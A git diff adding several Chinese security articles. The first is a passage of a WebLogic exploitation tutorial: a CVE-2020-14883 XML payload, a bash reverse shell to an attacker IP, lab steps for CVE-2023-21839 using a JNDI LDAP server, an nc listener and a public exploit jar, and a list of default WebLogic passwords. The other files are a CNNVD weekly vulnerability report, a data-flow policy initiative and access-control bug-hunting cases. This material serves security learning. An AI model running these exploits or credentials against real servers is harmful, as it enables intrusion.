+CVE-2020-14883: 权限绕过漏洞 + +远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console + +**漏洞原理** + +CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令 + +**影响范围** +``` +WebLogic 10.3.6.0.0 +WebLogic 12.1.3.0.0 +WebLogic 12.2.1.3.0 +WebLogic 12.2.1.4.0 +WebLogic 14.1.1.0.0 + +``` + +**漏洞复现** + +构造xml文件 +``` + + +     +         +           +            bash +            -c +             +           +         +     + + +``` + +访问.xml文件,会在tmp生成success文件 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Rhx36kzwYPOTIlfwxI9d2vIdW5suGaBN7lkgs4yicKlHfKCHFt016nGw/640?wx_fmt=png&from=appmsg "") + +同理:修改 .xml文件中& /dev/tcp/攻击机IP/4444 0>&1]>即可反弹shell +## 未授权远程代码执行漏洞(CVE-2023-21839) + +**漏洞原理** + +WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic  IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。 + +**影响范围:** +``` +12.2.1.2.0 +12.2.1.1.0 +12.2.1.3.0 +12.2.1.0.0 +12.2.1.4.0 +14.1.1.0.0 +12.1.2.0.0 +12.1.3.0.0 +10.3.6.0 + +``` + +**FOFA** +``` +app="BEA-WebLogic-Server" || app="Weblogic_interface_7001" + +``` + +Vulfocus 已经集成该漏洞环境可通过以下环境使用: +``` +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release +docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release + +``` + +**漏洞环境:**利用vulhub + +**漏洞复现:** + +下载https://github.com/WhiteHSBG/JNDIExploit + +1、搭建ldap服务 +``` +java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RxowSdrdOM9s8dNDFYmHic1trp7fm0uOwnRCmXnolWEqOmw8ic5kAzrxw/640?wx_fmt=png&from=appmsg "") + +2、kali 开启NC +``` +nc -lvvp 9999 + +``` + +3、下载EXP + +https://github.com/DXask88MA/Weblogic-CVE-2023-21839 + +执行命令 +``` +java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口 + +``` + +4、成功反弹shell,监听成功 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Riav7QKFcDjGwg7UOO68Rh2xLvSUq9icFGlRqf5pIyzEc4L48HubgiajlQ/640?wx_fmt=png&from=appmsg "") + +**Weblogic常用弱口令** + +可以去测试一下是否能登录上 +``` +weblogic/Oracle@123 +system/password +weblogic/weblogic +admin/security +joe/password +mary/password +system/security +wlcsystem/wlcsystem +wlpisystem/wlpisystem +weblogic/weblogic123 +weblogic/weblogic2 +system/password +weblogic/weblogic +admin/security +joe/password +mary/password +system/security +wlcsystem/wlcsystem +wlpisystem/wlpisystem +guest/guest +portaladmin/portaladmin +system/system +WebLogic/WebLogic + +``` + + diff --git a/doc/信息安全漏洞周报(2024年第47期).md b/doc/信息安全漏洞周报(2024年第47期).md new file mode 100644 index 00000000..08738233 --- /dev/null +++ b/doc/信息安全漏洞周报(2024年第47期).md @@ -0,0 +1,134 @@ +# 信息安全漏洞周报(2024年第47期) +原创 CNNVD CNNVD安全动态 2024-11-20 09:05 + +![](https://mmbiz.qpic.cn/mmbiz_gif/g1thw9Goocf2Ufz929a1thwAyKI8uIwUT7yfu4ibROBCthXslE23ia0ibWJVYlkxqulYy37zyiblBfrwib4m7erTkbQ/640?wx_fmt=gif&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/k5xJjBPo8ceEDyDtWwClGjzMFF89SzKxRwqsR5z89FRTn8YhflGDHd440FiafMOgcV0GYmiawnCH2GUGYcaciaG8g/640?&wx_fmt=gif "") + +**点击蓝字 关注我们** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aqTr2WnSRI6o0t7BMQpMu5RC6OgKfSTia0iclOkC3ibiao2LBH88P7F9nDjxDzYq9Y9PicS0OlPseqmQqHfiaM4TVq1w/640?&wx_fmt=gif "") + + + + +**漏洞情况** + +根据国家信息安全漏洞库(CNNVD)统计,本周2024年11月11日至2024年11月17日)安全漏洞情况如下: + +**公开漏洞情况** + +本周CNNVD采集安全漏洞1056个。 + +**接报漏洞情况** + +本周CNNVD接报漏洞27335个,其中信息技术产品漏洞(通用型漏洞)244个,网络信息系统漏洞(事件型漏洞)47个,漏洞平台推送漏洞27044个。 + +## 一公开漏洞情况 + + +根据国家信息安全漏洞库(CNNVD)统计,本周新增安全漏洞1056个,漏洞新增数量有所上升。从厂商分布来看WordPress基金会新增漏洞最多,有165个;从漏洞类型来看,跨站脚本类的安全漏洞占比最大,达到10.13%。新增漏洞中,超危漏洞104个,高危漏洞360个,中危漏洞529个,低危漏洞63个。 + +(一) 安全漏洞增长数量情况 + + + +本周CNNVD采集安全漏洞1056个。 + +![](https://mmbiz.qpic.cn/mmbiz_png/g1thw9GoocddR3ibdkiavEgxgJr1NcaDKemEJ3HB6D3zmrYQU11uRibpCiaZxkBdkQ4iaM36y0eFZHUvUnAP1c8E0Ew/640?wx_fmt=png&from=appmsg "") + +图1 近五周漏洞新增数量统计图 + +(二) 安全漏洞分布情况 + + + +从厂商分布来看,WordPress基金会新增漏洞最多,有165个。各厂商漏洞数量分布如表1所示。 + +表1 新增安全漏洞排名前五厂商统计表 +
序号
厂商名称
漏洞数量(个)
所占比例
1
WordPress
165
15.63%
2
Microsoft
91
8.62%
3
Intel
79
7.48%
4
Adobe
52
4.92%
5
Ivanti
49
4.64%
+本周国内厂商漏洞58个,友讯公司漏洞数量最多,有13个。国内厂商漏洞整体修复率为36.21%。请受影响用户关注厂商修复情况,及时下载补丁修复漏洞。 + +从漏洞类型来看,跨站脚本类的安全漏洞占比最大,达到10.13%。漏洞类型统计如表2所示。 + +表2 漏洞类型统计表 +
序号
漏洞类型
漏洞数量(个)
所占比例
1
跨站脚本
107
10.13%
2
代码问题
89
8.43%
3
缓冲区错误
62
5.87%
4
输入验证错误
35
3.31%
5
SQL注入
26
2.46%
6
路径遍历
26
2.46%
7
资源管理错误
25
2.37%
8
访问控制错误
19
1.80%
9
跨站请求伪造
18
1.70%
10
注入
17
1.61%
11
授权问题
16
1.52%
12
代码注入
14
1.33%
13
操作系统命令注入
13
1.23%
14
命令注入
10
0.95%
15
信息泄露
9
0.85%
16
信任管理问题
7
0.66%
17
参数注入
6
0.57%
18
后置链接
3
0.28%
19
日志信息泄露
2
0.19%
20
竞争条件问题
2
0.19%
21
数据伪造问题
1
0.09%
22
数字错误
1
0.09%
23
安全特征问题
1
0.09%
24
权限许可和访问控制问题
1
0.09%
25
加密问题
1
0.09%
26
其他
545
51.61%
+ +(三) 安全漏洞危害等级与修复情况 + + + +本周共发布超危漏洞104个,高危漏洞360个,中危漏洞529个,低危漏洞63个。相应修复率分别为77.88%、86.11%、78.07%和49.21%。根据补丁信息统计,合计835个漏洞已有修复补丁发布,整体修复率为79.07%。详细情况如表3所示。 + +表3 漏洞危害等级与修复情况 +
序号
危害等级
漏洞数量(个)
修复数量(个)
修复率
1
超危
104
81
77.88%
2
高危
360
310
86.11%
3
中危
529
413
78.07%
4
低危
63
31
49.21%
合计
1056
835
79.07%
+**** +(四) 本周重要漏洞实例 + + + +本周重要漏洞实例如表4所示。 + +表4 本期重要漏洞实例 +
序号
漏洞编号
危害等级
1
CNNVD-202411-2207
超危
2
CNNVD-202411-1574
高危
3
CNNVD-202411-1481
高危
+**1. WordPress plugin Backup and Staging by WP Time Capsule 代码问题漏洞(CNNVD-202411-2207)** + +WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 + +WordPress plugin Backup and Staging by WP Time Capsule 1.22.21版本及之前版本存在代码问题漏洞,该漏洞源于UploadHandler.php文件中缺少文件类型验证。攻击者利用该漏洞可以上传任意文件。 + +目前厂商已发布升级补丁以修复漏洞,参考链接: + +https://www.wordfence.com/threat-intel/vulnerabilities/ + +id/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve + +**2. Adobe Substance 3D Painter 缓冲区错误漏洞(CNNVD-202411-1574)** + +Adobe Substance 3D Painter是美国奥多比(Adobe)公司的一个3D纹理处理应用程序。 + +Adobe Substance 3D Painter 10.1.0版本及之前版本存在缓冲区错误漏洞,该漏洞源于允许内存越界写入。攻击者利用该漏洞可以在当前用户环境中执行任意代码。 + +目前厂商已发布升级补丁以修复漏洞,参考链接: + +https://helpx.adobe.com/security/products/substance3d_painter/apsb24-86.html + +**3. Microsoft SQL Server 安全漏洞(CNNVD-202411-1481)** + +Microsoft SQL Server是美国微软(Microsoft)公司的一套应用在Microsoft Windows系统下的大型商业数据库系统。 + +Microsoft SQL Server存在安全漏洞,该漏洞源于存在基于堆的缓冲区溢出问题。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响:Microsoft SQL Server 2019 for x64-based Systems (CU 29),Microsoft SQL Server 2017 for x64-based Systems (GDR),Microsoft SQL Server 2019 for x64-based Systems (GDR),Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR),Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack,Microsoft SQL Server 2017 for x64-based Systems (CU 31)。 + +目前厂商已发布升级补丁以修复漏洞,参考链接: + +https://msrc.microsoft.com/update-guide/vulnerability/ + +CVE-2024-49012 + +## 二漏洞平台推送情况 + + +本周CNNVD接收漏洞平台推送漏洞27044个。 + +表5 本周漏洞平台推送情况 +
序号
漏洞平台
漏洞总量
1
漏洞盒子
22687
2
补天平台
3788
3
360漏洞云
569
推送总计
27044
+**** +## 三接报漏洞情况 + + +本周CNNVD接报漏洞291个,其中信息技术产品漏洞(通用型漏洞)244个,网络信息系统漏洞(事件型漏洞)47个。 + +表6 本周漏洞报送情况 +
序号
报送单位
漏洞总量
1
个人
54
2
超聚变数字技术有限公司
45
3
北京天融信网络安全技术有限公司
25
4
星云博创科技有限公司
21
5
北京世纪超星信息技术发展有限责任公司
10
6
北京华云安信息技术有限公司
8
7
苏州棱镜七彩信息科技有限公司
8
8
广州纬安科技有限公司
7
9
内蒙古万邦信息安全技术有限公司
6
10
北京安帝科技有限公司
5
11
河南灵创电子科技有限公司
5
12
杭州美创科技股份有限公司
5
13
网宿科技股份有限公司
5
14
联通数字科技有限公司
5
15
河南省鼎信信息安全等级测评有限公司
5
16
北京时代新威信息技术有限公司
4
17
广州竞远安全技术股份有限公司
4
18
上海云盾信息技术有限公司
3
19
北京浩瀚深度信息技术股份有限公司
3
20
中资网络信息安全科技有限公司
3
21
北京知道创宇信息技术股份有限公司
3
22
华为技术有限公司
3
23
深信服科技股份有限公司
3
24
北京众安天下科技有限公司
3
25
天津市兴先道科技有限公司
3
26
温州市数据集团有限公司
3
27
杭州安恒信息技术股份有限公司
2
28
杭州戎戍网络安全技术有限公司
2
29
安恒愿景(成都)信息科技有限公司
2
30
卫士通(广州)信息安全技术有限公司
2
31
杭州海康威视数字技术股份有限公司
2
32
北京天防安全科技有限公司
2
33
途耀信息技术(上海)有限公司
2
34
贵州粟詈网络科技有限公司
1
35
奇安信网神信息技术(北京)股份有限公司
1
36
广西网信信息技术有限公司
1
37
北京神州绿盟科技有限公司
1
38
甘肃赛飞安全科技有限公司
1
39
星舟有信(北京)信息技术有限公司
1
40
甘肃丝路信安数字科技有限公司
1
41
山西轩辕信息安全技术有限公司
1
42
成都卫士通信息安全技术有限公司
1
43
北京天下信安技术有限公司
1
44
河南听潮盛世信息技术有限公司
1
45
北京金睛云华科技有限公司
1
46
成都思维世纪科技有限责任公司
1
47
九州安连(北京)科技有限公司
1
48
华易数安科技(吉林省)有限公司
1
49
江苏保旺达软件技术有限公司
1
50
中兴通讯股份有限公司
1
51
上海安几科技有限公司
1
52
浙江鑫诺检测技术有限公司
1
53
贵州蓝天创新科技有限公司
1
54
上海谋乐网络科技有限公司
1
55
北京寰宇天穹信息技术有限公司
1
56
内蒙古奥创科技有限公司
1
57
北京水木羽林科技有限公司
1
58
贵州多彩网安科技有限公司
1
59
天地伟业技术有限公司
1
60
北京君云天下科技有限公司
1
61
重庆嘉天琪科技有限公司
1
报送总计
291
+**** +## 四收录漏洞通报情况 + + +本周CNNVD收录漏洞通报128份。 + +表7 本周漏洞通报情况 +
序号
报送单位
通报总量
1
超聚变数字技术有限公司
12
2
中孚安全技术有限公司
12
3
杭州迪普科技股份有限公司
8
4
杭州中电安科现代科技有限公司
8
5
安恒愿景(成都)信息科技有限公司
6
6
宁波和利时信息安全研究院有限公司
6
7
奇安信网神信息技术(北京)股份有限公司
5
8
杭州美创科技股份有限公司
5
9
浙江大华技术股份有限公司
5
10
北京安帝科技有限公司
5
11
温州市数据集团有限公司
3
12
西安秦易信息技术有限公司
3
13
河南省鼎信信息安全等级测评有限公司
3
14
内蒙古中叶信息技术有限责任公司
3
15
北京神州绿盟科技有限公司
3
16
北京华云安信息技术有限公司
3
17
广东省信息安全测评中心
3
18
西安交大捷普网络科技有限公司
2
19
河南灵创电子科技有限公司
2
20
广西网信信息技术有限公司
2
21
华为技术有限公司
2
22
深信服科技股份有限公司
2
23
腾讯云计算(北京)有限责任公司
2
24
江苏保旺达软件技术有限公司
2
25
锐捷网络股份有限公司
1
26
北京墨云科技有限公司
1
27
上海矢安科技有限公司
1
28
深圳市深信服信息安全有限公司
1
29
北京天融信网络安全技术有限公司
1
30
新华三技术有限公司
1
31
北京君云天下科技有限公司
1
32
天地伟业技术有限公司
1
33
信元网络技术股份有限公司
1
34
杭州海康威视数字技术股份有限公司
1
35
厦门服云信息科技有限公司
1
36
郑州埃文科技有限公司
1
37
网宿科技股份有限公司
1
38
河南悦海数安科技有限公司
1
39
北京浩瀚深度信息技术股份有限公司
1
40
北京众安天下科技有限公司
1
41
杭州安恒信息技术股份有限公司
1
42
北京华顺信安信息技术有限公司
1
43
江西中和证信息安全技术有限公司
1
44
北京水木羽林科技有限公司
1
45
维安(山东)数字技术有限公司
1
收录总计
128
+ +![](https://mmbiz.qpic.cn/mmbiz_gif/tV4JDvMn6RMFN7ExSt7AEhx1DPNW68Bt8SXrAelC5L01auTNJkN19gJn8zP0hPAhSMHibfRNj70fV2aDD6u681Q/640?&wx_fmt=gif "") + + diff --git a/doc/全球数据跨境流动合作倡议.md b/doc/全球数据跨境流动合作倡议.md new file mode 100644 index 00000000..a3013d8f --- /dev/null +++ b/doc/全球数据跨境流动合作倡议.md @@ -0,0 +1,113 @@ +# 全球数据跨境流动合作倡议 + 中国网络空间安全协会 2024-11-20 04:21 + +伴随数字技术渗透到人类生产生活的方方面面,全球数字经济快速发展,数字社会逐步成为人们分享文明进步的新空间。数据作为数字经济的关键要素,在创新发展和公共治理中正在发挥越来越重要的作用。数据跨境流动对于各国电子商务、数字贸易乃至经济科技文化等诸多方面至关重要,不仅可以有效降低贸易成本,提高企业开展国际贸易的能力,还有助于促进贸易便利化,加快产业数字化转型,弥合数字鸿沟,实现以数据流动为牵引的新型全球化。目前,国际社会正在积极探索形成全球数字领域规则和秩序,联合国制定发布《全球数字契约》、世贸组织电子商务谈判以及《全面与进步跨太平洋伙伴关系协定》(CPTPP)、《数字经济伙伴关系协定》(DEPA)等多双边实践正在开展,这些均体现了推动全球数据跨境流动合作、促进数据跨境流动已经成为各国或地区共同的意愿和选择。 + + +我们注意到,在推动全球数据跨境流动实践的同时,各国普遍关注国家安全、公共利益、个人隐私以及知识产权等风险。我们认为,国际社会应在充分尊重各国、各地区因具体国情、社情而采取的不同政策法规和实践基础上,认真听 +取各方数据安全与发展的利益诉求,通过协商的方式推动国家间、地区间数据跨境流动规则形成共识。 + + +我们呼吁各国秉持开放、包容、安全、合作、非歧视的原则,平衡数字技术创新、数字经济发展、数字社会进步与保护国家安全、公共利益、个人隐私和知识产权的关系,在推动数据跨境流动的同时实现各国合法政策目标。我们期待政府、国际组织、企业、民间机构等各主体坚守共商共建共享理念,发挥各自作用,推动全球数据跨境流动合作,携手构建高效便利安全的数据跨境流动机制,打造共赢的数据领域国际合作格局,推动数字红利惠及各国人民。 + + +为此,我们倡议各国政府: + + +——鼓励因正常商业和社会活动需要而通过电子方式跨境传输数据,以实现全球电子商务和数字贸易为各国经济增长和可持续增长提供新的动力。 + + +——尊重不同国家、不同地区之间数据跨境流动相关制度的差异性。支持不涉及国家安全、公共利益和个人隐私的数据自由流动。允许为实现合法公共政策目标对数据跨境流动进行监管,前提是相关监管措施不构成任意或不合理的歧视或对贸易构成变相限制,不超出实现目标所要求的限度。 + + +——尊重各国依法对涉及国家安全、公共利益的非个人数据采取必要的安全保护措施,保障相关非个人数据跨境安全有序流动。 + + +——尊重各国为保护个人隐私等个人信息权益采取的措施,鼓励各国在保护个人信息的前提下为个人信息跨境传输提供便利途径,建立健全个人信息保护法律和监管框架,鼓励就此交流最佳实践和良好经验,提升个人信息保护机制、规则之间的兼容性,推动相关标准、技术法规及合格评定程序的互认。鼓励企业获得个人信息保护认证,以表明其符合个人信息保护标准,保障个人信息跨境安全有序流动。 + + +——鼓励探索建立数据跨境流动管理负面清单,促进数据跨境高效便利安全流动。 + + +——合力构建开放、包容、安全、合作、非歧视的数据流通使用环境,共同维护公平公正的市场秩序,促进数字经济规范健康发展。 + + +——提高各类数据跨境流动管理措施的透明度、可预见性和非歧视性,以及政策框架的互操作性。 + + +——积极开展数据跨境流动领域的国际合作。支持发展中国家和最不发达国家有效参与和利用数据跨境流动以促进数字经济增长,鼓励发达国家向发展中国家,特别是最不发达国家提供能力建设和技术援助,弥合数字鸿沟,实现公平和可持续发展。 + + +——鼓励利用数字技术促进数据跨境流动创新应用,提高保障数据跨境高效便利安全流动的技术能力,推动数据跨境流动相关的技术与安全保障能力评价标准的国际互认,做好知识产权保护工作。 + + +——反对将数据问题泛安全化,反对在缺乏事实证据的情况下针对特定国家、特定企业差别化制定数据跨境流动限制性政策,实施歧视性的限制、禁止或者其他类似措施。 + + +——禁止通过在数字产品和服务中设置后门、利用数字技术基础设施中的漏洞等手段非法获取数据,共同打击数据领域跨境违法犯罪活动,共同保障各国公民和企业的合法权益。 + + +我们愿意在以上倡议基础上与各方开展和深化数据跨境流动领域的交流合作,我们呼吁各国、各地区通过双多边或地区协议、安排等形式呼应、确认上述倡议。欢迎国际组织、企业、民间机构等各主体支持本倡议。 + + +**Global Cross-border Data Flow** +**Cooperation Initiative** + + +As digital technologies increasingly permeate every aspect of daily life and production, the global digital economy has experienced rapid development, with digital societies emerging as new spaces for sharing the progress of human civilization. As an essential element in the digital economy, data is playing an increasingly important role in innovative development and public governance. Cross-border data flows are vital to e-commerce, digital trade, and various aspects of global economic, technological and cultural activities. It can reduce trade cost, enhance companies' capacity to engage in international trade, facilitate trade processes, accelerate industrial digitalization, bridge the digital divide, and foster a new type of globalization driven by data flows. Currently, the international community is actively exploring and establishing global rules and order in the digital sphere. Bilateral and multilateral efforts such as the Global Digital Compact by the United Nations, negotiations on e-commerce at the World Trade Organization, the Comprehensive and Progressive Agreement for Trans-Pacific Partnership, and the Digital Economy Partnership Agreement exemplify the shared willingness of and choices made by countries and regions worldwide to promote cooperation on cross-border data flows. + + +We noticed that, while promoting global cross-border data flows, countries are primarily concerned with risks related to national security, public interests, personal privacy, and intellectual property. We believe that the international community should fully respect the different policies and practices adopted by various countries and regions based on their specific conditions. It is crucial to pay heed to each party's concerns regarding data security and development and to work toward building consensus on cross-border data flow rules through consultation among countries and regions. + + +We call on all countries to uphold principles of openness, inclusiveness, security, cooperation, and non-discrimination, balance the promotion of digital technology innovation, the development of the digital economy, and the advancement of digital society with the protection of national security, public interests, personal privacy, and intellectual property, and foster cross-border data flows while ensuring that each country's legitimate policy goals are met. We hope that governments, international organizations, businesses, and civil society will adhere to the principles of extensive consultation, joint contribution, and shared benefits. By playing their respective roles, they can promote global cooperation on cross-border data flow, jointly build a mechanism to ensure efficient, convenient and safe cross-border data flow and an open and mutually beneficial landscape for international cooperation in the data sphere, and ensure that the benefits of digital advancements are shared by people worldwide. + + +To make this happen, we suggest the following: + + +——Governments should encourage electronic cross-border data transmission to meet the needs of business and social activities. This will help global e-commerce and digital trade serve as new drivers for economic growth and sustainable development. + + +——Governments should respect the regulatory differences of various countries and regions in cross-border data flows. They should support free data flows that do not violate national security, public interests, and personal privacy. Regulations on cross-border data flows should be permitted when they aim to achieve legitimate public policy objectives on the premise that such regulatory measures do not constitute a means of arbitrary or unjustifiable discrimination or a disguised restriction on international trade, and do not cross the limits of the goals they seek to achieve. + + +——Governments should respect security measures taken by all countries in accordance with their laws to protect non-personal data related to national security and public interests, and ensure the secure and orderly cross-border flows of relevant non-personal data.  + + +——Governments should respect measures taken by all countries to protect personal information rights and interests including individual privacy. Countries should be encouraged to provide convenient channels for cross-border transmission of personal information on the condition that such information is well protected. Countries should be encouraged to establish and improve legal and supervision frameworks on personal information protection, conduct exchanges on best practices and experiences, improve the compatibility of personal information protection mechanisms and rules, and foster mutual recognition of relevant standards, technology regulations and conformity assessment procedures. Enterprises should be encouraged to obtain personal information protection certifications to demonstrate their compliance with personal information protection standards and ensure the secure and orderly cross-border flows of personal information.  + + +——Governments should support exploring the establishment of negative lists for managing cross-border data flow to promote efficient, convenient and safe cross-border data flow. + + +——Governments should work together to create a data flow and usage environment that is open, inclusive, secure, and non-discriminatory, jointly uphold a fair and just market order, and promote the orderly and healthy development of the digital economy.  + + +——Governments should enhance the transparency, predictability, and non-discriminatory nature of measures managing the cross-border flows of various types of data, as well as the interoperability of policy frameworks. + + +——Governments should actively conduct international cooperation in the field of cross-border data flows. Support should be given to developing countries and the least developed countries to enable them to effectively participate in and utilize cross-border data flows so as to promote their digital economic growth. Developed countries should be encouraged to provide capacity building and technical assistance to developing countries, especially the least developed ones, in order to bridge the digital divide and achieve fair and sustainable development.  + + +——Governments should encourage the use of digital technologies to promote innovative applications in cross-border data flows. They should improve technological capabilities to ensure efficient, convenient and safe cross-border data flows. They should advance international mutual recognition of evaluation standards for technical and security assurance capabilities related to cross-border data flows, and ensure effective intellectual property protection.  + + +——Governments should oppose overstretching the concept of national security on data issues. They should object to making restrictive and differentiated policies on cross-border data flows targeting specific countries and enterprises without factual evidence, or implementing discriminatory restrictions, prohibitions, and other similar measures against specific countries and enterprises.  + + +——Governments should prohibit illicit acquisition of data through methods such as setting up backdoors in digital products and services or exploiting vulnerabilities in digital technology infrastructure. They should collaborate to crack down on cross-border illegal activities in the data field and jointly safeguard the legitimate rights and interests of citizens and enterprises in all countries.  + + +We are ready to carry out and deepen exchanges and cooperation in the field of cross-border data flows with all parties based on the above initiative. We call on all countries and regions to respond to and endorse the above initiative through bilateral, multilateral, or regional agreements and arrangements. We welcome the support of international organizations, businesses, and civil society for this initiative.  + +转载来源:“网信中国”微信公众号 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/oVwibkSe4A7TPcLD2ib9sobfacpxkOfJHmoolC01EdiaCUsgdibZ3w4A9abSpGp6ueIyvzyfkE4R3OJ3Y4hqTpc4yw/640?wx_fmt=jpeg "") + +**中国网络空间安全协会** + + +**长按识别左侧二维码,关注我们** + diff --git a/doc/几个常见的越权漏洞挖掘案例.md b/doc/几个常见的越权漏洞挖掘案例.md new file mode 100644 index 00000000..b063dac7 --- /dev/null +++ b/doc/几个常见的越权漏洞挖掘案例.md @@ -0,0 +1,144 @@ +# 几个常见的越权漏洞挖掘案例 +原创 十二 起凡安全 2024-11-20 09:31 + +**水平越权1** + +我的随手拍这里,点击删除抓个包 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkERSQfLXamnUMsXKztzicnhQ2Fj3ecxBOvqicv21TU2x1gJUHQfwRmic9cg/640?wx_fmt=png&from=appmsg "") + +可以看到是ids这个参数控制的 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkExx2pw2OGIP1e9LI7kgD6icq3jAPBYZyoSVf5ug5K0tHH2dgN3f7iaw2g/640?wx_fmt=png&from=appmsg "") + +回到首页,点个查询抓个包 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEZLJcTtoqHPvyeqfm08hQSS9B3ffkgUGcFq3mMopz5p4wQphKsPeK9Q/640?wx_fmt=png&from=appmsg "") + +很明显这个ri_ir参数的值就是我们需要的ids + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEKghDk0fia3RzHCWgLwJNxxEopFv66SbdaCxY4XYtr02RBFd89326oxA/640?wx_fmt=png&from=appmsg "") + +直接复制过来发送,回显true + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEvQYFibDUnZTe3PvUvl3dicZNdu4ojahhjLU71wPlcZ71ic8KiamkpY7l6Q/640?wx_fmt=png&from=appmsg "") + +记得回首页验证一下这条数据是否被删除 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkERoOJPuzW6unaiceFg6pY1daLxVOlaSgOQCVu39XQBKR29an56ye1uRA/640?wx_fmt=png&from=appmsg "") + +一般一个地方有越权,像删除增加或者其他功能点大概率也存在越权 + +**水平越权2** + +点击新增功能点 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0PeMUEGh7ALOntib40r5nEd3b1KC7Aic7xcCotdts7yAkpmmnhl6GlPuA/640?wx_fmt=png&from=appmsg "") + +这里选择学号,会先进行查询 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0LGb0Q6TRRN1A1MkZodbxkz54dGOlhZ9DaDABggbWKIDupFXf6H5qiag/640?wx_fmt=png&from=appmsg "") + +data参数包含学号 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0O3po2069gtcDDWnLFyf1jYPu2HiajzQf8oiaIk0Lh6E237zPYt1KicVibw/640?wx_fmt=png&from=appmsg "") + +直接遍历即可,逻辑很简单,只是功能点不容易被发现 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0ibYVms3WUbsYnEY2tzMIRMmfwF318Zch0kutrCjFdoZVz1YXBzsO9IA/640?wx_fmt=png&from=appmsg "") + +**垂直越权1** + +接口未做鉴权,只判断了用户是否登录,并没有校验用户是否有相应的权限 + +某功能点 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN56DpRmMicuNcT4L6lOJaGIBY1JcOTJoSzG8vaGcjnQ8U4Xt0jB1fMXw/640?wx_fmt=png&from=appmsg "") + +这里可以看到无任何数据,用bp开启拦截,F5刷新页面 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNyvbnRSt9VekwEoJhIqnx2u2vKczN6VKMKeEaxiafpibupibJAUpJeGHkQ/640?wx_fmt=png&from=appmsg "") + +可以看到这是原有的数据包 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN3Mph7IxtSnmItN0m4Mfjss3xGlbdzmrZljFuiaSZGjdTALfic7sDYMKg/640?wx_fmt=png&from=appmsg "") + +这里把后面参数全删掉,放包 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNxJlaecvFlPTO5jRh4K2Z2ftYHlJHQMZstVqSXGaswHL2elkyIs5PtQ/640?wx_fmt=png&from=appmsg "") + +回到浏览器发现返回了全部数据 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNxdBlRPGcpFLSUG6Yd9Np09NmzxERsgkoOJUcZzibEBBU5Zr8WBIGiacA/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN0YjJSZibmXquVDOJqggMOw2Go0wumr9REWjk8iaTasVFL1IH72fbXONA/640?wx_fmt=png&from=appmsg "") + 